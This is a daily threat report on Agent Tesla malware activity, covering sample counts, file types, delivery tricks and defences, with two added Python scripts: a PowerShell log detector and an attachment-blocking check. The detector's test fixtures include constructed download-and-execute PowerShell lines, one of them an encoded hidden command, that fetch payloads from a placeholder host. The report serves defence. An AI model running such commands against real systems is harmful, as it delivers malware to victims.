Agent Tesla - Daily Threat Report

Saturday, April 25, 2026

Daily Summary

Agent Tesla activity rose to 66 new samples on 2026-04-25, about 22% above the 7-day average of 54. The rising trend continues, driven primarily by a sharp uptick in JavaScript-based loaders. This is one of the higher single-day volumes observed this week and indicates renewed campaign intensity.

New Samples Detected

The 66 samples are dominated by .js files (25, or 38%), well ahead of the 19 .exe executables (29%). PowerShell (.ps1) scripts account for 9 samples, with .bat (4), .rar (3), and a smattering of .tgz, .vbs, .img, .vbe, and .infected files. The shift toward script-based payloads (.js and .ps1 together make up 52% of the total) suggests actors are prioritizing loaders that run under interpreters already present on the host (wscript.exe, powershell.exe) and that are cheap to re-obfuscate, over direct executables.

Distribution Methods

The file type distribution is consistent with a multi-stage infection chain. JavaScript files likely serve as initial droppers, downloading secondary payloads (PowerShell or .bat scripts) which then execute the final Agent Tesla .exe. The archive files (.rar, .tgz) indicate that some campaigns still wrap the loader in an attachment the email gateway cannot fully inspect, often a password-protected archive. The single .img file is best read as a Windows delivery trick rather than a macOS lure: Agent Tesla is a .NET stealer that runs only on Windows, and Windows 8 and later mount .img and .iso disk images with a double-click. Until Microsoft changed the behaviour in late 2022, files extracted from a mounted image did not carry the Mark-of-the-Web, so SmartScreen and Office Protected View did not trigger on them; unpatched hosts still behave that way.

Detection Rate

No per-sample AV verdicts are included in today's data, so the detection rate can only be estimated. The established-signature argument cuts the other way for script loaders: .js and .ps1 files are regenerated with fresh obfuscation far more cheaply than a compiled .exe, so hash and string signatures for yesterday's samples should not be assumed to cover today's. Detection of this family rests more on behaviour (wscript.exe or cscript.exe spawning powershell.exe, PowerShell fetching a remote payload, a new process reading browser and mail-client credential stores) than on file-level signatures. The .img sample can slip past scanners that do not mount disk images, and the .vbe sample is Microsoft Script Encoder output, which defeats naive string matching even though the encoding is trivially reversible. SOC analysts should watch for JavaScript files with heavy encoding and for PowerShell that decodes and executes content in memory (Base64 decoding feeding Invoke-Expression, -EncodedCommand, downloaded strings run without touching disk) to bypass static scanning.
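The in-memory deobfuscation patterns just mentioned are easiest to catch in PowerShell Script Block Logging (Event ID 4104), which records the script text after PowerShell has decoded it. The following is an added example, not tooling from this report or its data sources: it scans constructed ScriptBlockText values (made up for illustration, not real Agent Tesla samples) for decode-and-execute indicators, decodes long Base64 runs one level deep so that a -EncodedCommand payload is inspected too, and assigns a simple triage level. The indicator names, the regexes and the triage thresholds are this example's own choices, not a standard taxonomy.

```python
"""Flag PowerShell script blocks that decode or fetch code and run it in memory.

Added example for this report, not tooling from the original page. It scans the
ScriptBlockText of Event ID 4104 records; the three records below are
constructed for illustration and are not Agent Tesla samples. Indicator names
and triage levels are this example's own.
"""
import base64
import re

# Each indicator is (name, regex). Hits on the raw text and on any Base64
# payload it carries (decoded one level) are reported separately.
INDICATORS = [
    ("base64_decode",     re.compile(r"FromBase64String", re.I)),
    ("invoke_expression", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
    ("encoded_command",   re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_string",   re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer", re.I)),
    ("reflective_load",   re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\(", re.I)),
]
EXECUTION = {"invoke_expression", "encoded_command", "reflective_load"}
STAGING = {"base64_decode", "download_string"}

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _bytes_to_text(raw):
    """Decode a Base64 payload as text, or return None if it is not text.

    -EncodedCommand payloads are UTF-16LE; ASCII in that encoding has a NUL in
    every odd byte position, which is a cheap and reliable tell.
    """
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def decode_payloads(text):
    """Return the text of every long Base64 run in *text* that decodes cleanly."""
    found = []
    for match in B64_RUN.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        decoded = _bytes_to_text(raw)
        if decoded:
            found.append(decoded)
    return found


def analyze_script_block(text, depth=0):
    """Return sorted indicator names found in *text* and, prefixed with
    'decoded:', in any Base64 payload it embeds (one level deep)."""
    hits = {name for name, rx in INDICATORS if rx.search(text)}
    if depth == 0:
        for payload in decode_payloads(text):
            hits.update("decoded:" + h for h in analyze_script_block(payload, 1))
    return sorted(hits)


def triage(text):
    """'high' when a staging indicator (decode/download) and an execution
    indicator (IEX, -enc, reflective load) both appear, 'medium' for any hit."""
    hits = analyze_script_block(text)
    names = {h.split(":", 1)[-1] for h in hits}
    if names & EXECUTION and names & STAGING:
        return "high", hits
    if names:
        return "medium", hits
    return "none", hits


# Constructed 4104 ScriptBlockText values (not real samples).
_STAGE2 = b"(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
_ENC = "Invoke-WebRequest http://example.invalid/a.exe -OutFile $env:TEMP\\a.exe; Start-Process $env:TEMP\\a.exe"
SAMPLE_EVENTS = [
    # Routine admin activity, should not fire.
    "Get-ChildItem C:\\Logs -Filter *.evtx | Where-Object Length -gt 1MB",
    # Loader pattern: Base64 decoded in memory and handed straight to IEX.
    "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + base64.b64encode(_STAGE2).decode() + "')))",
    # -EncodedCommand carrying a UTF-16LE download-and-run payload.
    "powershell.exe -nop -w hidden -enc " + base64.b64encode(_ENC.encode("utf-16-le")).decode(),
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        level, hits = triage(event)
        print(f"{level:6} {hits}")
```

Pointed at real data, the text would come from the ScriptBlockText field of forwarded 4104 events. The one-level decode matters because the first-stage script often carries the actual download logic only as a Base64 string, so the download indicator would be missed by scanning the raw block alone.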

C2 Infrastructure

No new C2 servers were identified today; all 66 IOCs are sample hashes and file metadata. The absence of new server data may mean actors are reusing existing infrastructure, or that they have rotated to domains the tracker has not yet observed. C2s reported on previous days therefore remain the infrastructure to monitor and block.

7-Day Trend

Against a 7-day average of 54 samples, today's 66 is a notable spike above the weekly baseline. Activity appears to be ramping up, possibly signaling the start of a new campaign push or an increase in automated distribution.

Security Analysis

Two .tgz (tar.gz) archives stand out. Windows has no built-in handler for this format, so a victim needs a third-party archiver installed before the contents can even be opened; that points either at technically inclined recipients or at repackaging by whoever submitted the sample rather than at the attacker's own lure. The single .vbe file is VBScript passed through Microsoft's Script Encoder; the encoding is standard, reversible and executed natively by the Windows Script Host on every supported Windows version, so its purpose is to defeat string-based scanning rather than to target older systems. Defensive recommendations: block .js (and the rest of the Windows Script Host family: .jse, .vbs, .vbe, .wsf) as email attachments at the gateway, including inside archives; change the default handler for those extensions on endpoints from wscript.exe to a text editor so a double-click opens the file instead of running it; and do not rely on the PowerShell execution policy, which is not a security boundary (powershell.exe -ExecutionPolicy Bypass overrides it, and it never restricted downloads). Instead enable Script Block Logging (Event ID 4104) and Module Logging, forward both to the SIEM, and review them retrospectively for decode-and-execute patterns.
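As an added example of the gateway-side check recommended above (it is not the report's or any vendor's tooling), the script below decides whether an attachment should be blocked: it rejects the Windows Script Host family, PowerShell and batch scripts, executables and disk images outright, and opens .zip and .tar/.tgz archives to apply the same rule to their members, two levels deep. Encrypted zip members and .rar archives, which the standard library cannot open, are reported as uninspectable rather than passed as clean, which is exactly the gap the archive trick in the Distribution Methods section relies on. All attachments are constructed in memory with placeholder bytes so the script runs offline; the extension lists are this example's own.

```python
"""Decide whether an email attachment should be blocked, looking inside archives.

Added example for this report (not its own tooling). Attachments are built in
memory from placeholder bytes so the script runs offline; nothing here is a
real sample. Extension lists are this example's choices.
"""
import io
import tarfile
import zipfile
from pathlib import PurePosixPath

# Windows executes these on double-click (Script Host, PowerShell, cmd, PE) or,
# for .img/.iso, mounts them so the user can double-click what is inside.
BLOCKED_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".ps1",
               ".bat", ".cmd", ".exe", ".scr", ".img", ".iso"}
ARCHIVE_EXT = {".zip", ".tgz", ".tar", ".gz"}
MAX_DEPTH = 2          # nested archives to open before giving up


def _last_suffix(name):
    # Only the final extension picks the Windows handler, so "invoice.pdf.js"
    # is a script no matter how many decoy extensions precede it.
    suffixes = PurePosixPath(name).suffixes
    return suffixes[-1].lower() if suffixes else ""


def _zip_members(data):
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                # General-purpose bit 0 marks an encrypted entry (ZIP spec 4.4.4).
                encrypted = bool(info.flag_bits & 0x1)
                yield info.filename, (None if encrypted else zf.read(info))


def _tar_members(data):
    # mode "r:*" auto-detects plain and gzip-compressed tar.
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for member in tf.getmembers():
            if member.isfile():
                yield member.name, tf.extractfile(member).read()


def inspect_attachment(name, data, depth=0, path=None):
    """Return a list of (path, reason) findings; an empty list means allow."""
    path = path or name
    ext = _last_suffix(name)
    if ext in BLOCKED_EXT:
        return [(path, f"blocked extension {ext}")]
    if ext == ".rar":
        # No RAR reader in the standard library: uninspectable, so not "clean".
        return [(path, "rar archive cannot be inspected")]
    if ext not in ARCHIVE_EXT:
        return []
    if depth >= MAX_DEPTH:
        return [(path, "archive nested too deep to inspect")]
    findings = []
    try:
        members = _zip_members(data) if ext == ".zip" else _tar_members(data)
        for member_name, member_data in members:
            member_path = f"{path}!{member_name}"
            if member_data is None:
                findings.append((member_path, "encrypted member cannot be inspected"))
            else:
                findings.extend(inspect_attachment(member_name, member_data, depth + 1, member_path))
    except (zipfile.BadZipFile, tarfile.TarError):
        findings.append((path, "archive could not be parsed"))
    return findings


def blocked_attachments(attachments):
    """Names of the attachments in {name: bytes} that have at least one finding."""
    return sorted(name for name, data in attachments.items() if inspect_attachment(name, data))


def _make_zip(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def _make_tgz(entries):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, data in entries.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed attachments with placeholder contents (not real malware).
SAMPLE_ATTACHMENTS = {
    "invoice.pdf.js": b"// placeholder loader body",
    "notes.txt": b"nothing to see here",
    "report.tgz": _make_tgz({"docs/readme.txt": b"hello", "docs/invoice.js": b"// placeholder"}),
    "photos.zip": _make_zip({"cat.jpg": b"\xff\xd8\xff", "nested.zip": _make_zip({"setup.exe": b"MZ placeholder"})}),
    "disk.img": b"\x00" * 32,
    "archive.rar": b"Rar!\x1a\x07\x00",
}

if __name__ == "__main__":
    for name, data in SAMPLE_ATTACHMENTS.items():
        print(name, inspect_attachment(name, data) or "allow")
```

The decision is made on the final extension only, because that is what picks the handler on Windows; a "report.pdf.js" decoy is still a script. A real gateway would add RAR and 7z parsers and a size cap on decompressed output, but the policy shape stays the same: anything that cannot be opened is blocked, not waved through.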

Further Reading

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)